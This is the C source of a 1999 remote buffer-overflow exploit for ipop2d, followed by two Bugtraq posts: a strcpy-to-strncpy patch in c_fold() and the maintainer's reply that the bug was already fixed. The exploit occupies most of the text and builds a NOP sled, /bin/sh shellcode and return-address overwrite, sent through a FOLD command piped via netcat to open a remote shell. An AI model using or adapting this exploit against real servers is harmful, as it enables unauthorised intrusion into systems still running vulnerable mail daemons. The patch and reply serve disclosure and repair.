/* 
 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 * 
 * by c0nd0r <condor@sekure.org>
 *
 *  (read the instructions below)
 *               
 *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
 *        also to #uground (irc.brasnet.org) and #SDI (efnet),
 *            guys at el8.org, toxyn.org, pulhas.org
 *
 *  Sincere Apologizes: duke (for the mistake we made with the wu-expl), 
 *                     your code rocks.
 *
 *  Usage: 
 *
 *    SDI-pop2 <imap_server> <user> <pass> [offset]   
 *
 *   where  imap_server = IMAP server at your box (or other place as well)
 *      user = any account at your box
 *      pass = the account's password 
 *          offset = 0 is default -- increase if it's necessary.        
 *
 *  Example: (netcat rocks)
 *  
 *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *
 *  ----------------------------------------------------------------
 *  HOWTO-exploit:
 *
 *   In order to gain remote access as user nobody, you should set 
 *   an IMAP server at your box (just edit the inetd.conf) or at 
 *   any other machine which you have an account.
 *     
 *   During the anonymous_login() function, the ipop2d will set the 
 *   uid to user nobody, so you are not going to get a rootshell.
 *  ----------------------------------------------------------------
 *
 */


#include <stdio.h>

/* 
 *  (shellcode) 
 *
 *       jmp   0x1f
 *       popl  %esi
 *       movl  %esi,0x8(%esi)
 *       xorl  %eax,%eax
 *       movb  %eax,0x7(%esi)
 *       movl  %eax,0xc(%esi)
 *       movb  $0xb,%al
 *       movl  %esi,%ebx
 *       leal  0x8(%esi),%ecx
 *       leal  0xc(%esi),%edx
 *       int   $0x80
 *       xorl  %ebx,%ebx
 *       movl  %ebx,%eax
 *       inc   %eax
 *       int   $0x80
 *       call  -0x24
 *       .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org
 */ 

char c0d3[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";


main (int argc, char *argv[] ) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 char host[255], user[255], pass[255];
 int bsize=986;
 
 if ( argc < 4) {
  printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  printf ( "usage: 
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  exit (0);
 }

 snprintf ( host, sizeof(host), "%s", argv[1]);
 snprintf ( user, sizeof(user), "%s", argv[2]);
 snprintf ( pass, sizeof(pass), "%s", argv[3]);
 
 if ( argc > 4) offset = atoi ( argv[4]);
 /* gimme the ret + offset */ 
 addr = 0xbffff3c0 + offset; 
 fprintf ( stderr, "0wning data since 0x%x\n\n", addr);

 /* calculation of the return address position */ 
 bsize -= strlen ( host);

 for ( x = 0; x < bsize-strlen(c0d3); x++) 
  buf[x] = 0x90;

 for ( y = 0; y < strlen(c0d3); x++, y++)
  buf[x] = c0d3[y];

 for (  ; x < 1012; x+=4) {
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }

 sleep (1);
 printf ( "HELO %s:%s %s\r\n", host, user, pass);
 sleep (1);
 printf ( "FOLD %s\r\n", buf);

}

--------------------------------------------------------------------------------

Date: Thu, 3 Jun 1999 17:29:05 -0300
From: dumped <dumped@SEKURE.ORG>
To: BUGTRAQ@netspace.org
Subject: ipop2d buffer overflow fix

This patch fixes the buffer overflow previously pointed by Thiago.


diff -Nur imap-4.4.orig/src/ipopd/ipop2d.c imap-4.4/src/ipopd/ipop2d.c
--- imap-4.4.orig/src/ipopd/ipop2d.c    Thu Jun  3 18:35:15 1999
+++ imap-4.4/src/ipopd/ipop2d.c Thu Jun  3 18:37:02 1999
@@ -10,7 +10,10 @@
  *             Internet: MRC@CAC.Washington.EDU
  *
  * Date:       28 October 1990
- * Last Edited:        13 July 1998
+ * Last Edited:        3 June 1999
+ *
+ * dumped (dumped@sekure.org) 3/Jun/99 :
+ * fixed a buffer overflow in c_fold()
  *
  * Copyright 1998 by the University of Washington
  *
@@ -306,7 +309,8 @@
                                /* don't permit proxy to leave IMAP */
   if (stream && stream->mailbox && (s = strchr (stream->mailbox,'}'))) {
     strncpy (tmp,stream->mailbox,i = (++s - stream->mailbox));
-    strcpy (tmp+i,t);          /* append mailbox to initial spec */
+    strncpy (tmp+i,t,sizeof(tmp) - strlen(stream->mailbox));   
+       /* append mailbox to initial spec */
     t = tmp;
   }
                                /* open mailbox, note # of messages */

--------------------------------------------------------------------------------

Date: Thu, 3 Jun 1999 14:02:59 -0700
From: Mark Crispin <MRC@CAC.WASHINGTON.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: ipop2d buffer overflow fix

This problem was fixed several months ago, and a CERT advisory issued.  The
fix is in the current distribution version.

imap-4.4 is an old version.